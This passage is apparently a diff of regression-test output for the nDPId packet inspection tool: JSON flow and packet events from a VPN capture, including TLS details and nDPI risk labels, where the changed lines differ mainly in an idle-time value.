{"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569687259269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687259269,"pkt":"AQBeAAD7GIEORo7ICABFAACMyOAAAP8RBrAKAADV4AAA+xTpFOkAeGDGAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmzqBDkaOyBiBDkaOyA=="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569687259270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687259270,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u7wAAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCbOoEORo7IGIEORo7I"} 
00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1569687259297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687259297,"pkt":"GIEORo7INDY7z3UoCABFAAEEsFAAAP8R9OAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAo3\/wAAEAGn4oKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoLkYAAEAGUUEKAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAo3\/wAAEAGn4oKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569687259694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687259694,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoLkYAAEAGUUEKAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAACGIEORo7ICABGAAAgPP4AAAEC\/QIKAADV4AAAApQEAAAXAAgE4AAA+w=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAD7GIEORo7ICABGAAAgpGYAAAEClKEKAADV4AAA+5QEAAAWAAkE4AAA+w=="} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7440000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"} 
-00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7560000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"} 
+00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"} 
+00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
